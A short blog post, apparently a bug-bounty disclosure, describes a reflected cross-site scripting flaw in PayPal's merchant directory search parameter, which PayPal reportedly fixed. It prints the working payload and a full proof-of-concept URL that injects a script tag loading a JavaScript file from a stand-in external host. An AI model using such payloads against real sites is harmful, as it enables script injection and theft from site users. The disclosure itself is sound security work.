Dear followers, i found a reflected Cross Site Scripting issue on the new Paypal Directory service (https://www.paypal.com/directory/merchants), with the following Payload:
&q=509%22%20src=%22http://www.example.com/exploit509.js%20%3C script %3E alert %281%29%3C/ script %3E
The vulnerable Parameter was the q? Parameter, i was able to break the script contex of the page, i think it was because of the &q Parameteter, but i am not sure Paypal fixed this issue to fast so i couldn’t analyze it more in depth :/
https://www.paypal.com/directory/merchants?q=&q=509%22%20src=%22http://www.example.com/exploit509.js%20%3C script %3E alert %281%29%3C/ script %3E
Here is my POC i sent in to Paypal : hope you enjoyed! If you have any kind of question please don’t hesitate to ask me, either way here or via email at patrik.fehrenbach(at)it-securityguard.com All the best Patrik
English 
German